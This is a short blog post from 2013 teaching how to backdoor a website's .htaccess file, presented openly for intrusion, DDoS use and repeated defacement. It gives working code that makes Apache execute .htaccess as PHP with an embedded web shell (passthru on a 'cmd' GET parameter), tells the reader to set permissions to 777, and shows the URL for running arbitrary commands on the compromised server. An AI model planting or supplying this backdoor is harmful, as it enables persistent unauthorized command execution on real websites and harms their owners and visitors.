Smiley face
Smiley face

Saturday, September 28, 2013

How to backdoor .htaccess

Today i'm gonna teach you how to backdoor .htaccess file of a website.

First Of All Let Me Answer This Question :
Q) "What can you do with a backdoored website?"
Ans) Well, u can do lots of things. Like you can install php proxy, you can
use for ddosing, you can deface the site again after admin brings site
back without deleting the backdoor etc...

Add the code below to the .htaccess file and change permission to 777 (chmod 777) 

Code:
<Files ~ "^\.ht">

Order allow,deny

Allow from all

</Files>

AddType application/x-httpd-php .htaccess

# <?php passthru($_GET['cmd']); ?>

Now Go To:

Code:
site.com/.htaccess?cmd=ls

And now you can run a command of your choice! Wink

0 Comments:

Post a Comment

Smiley face
Smiley face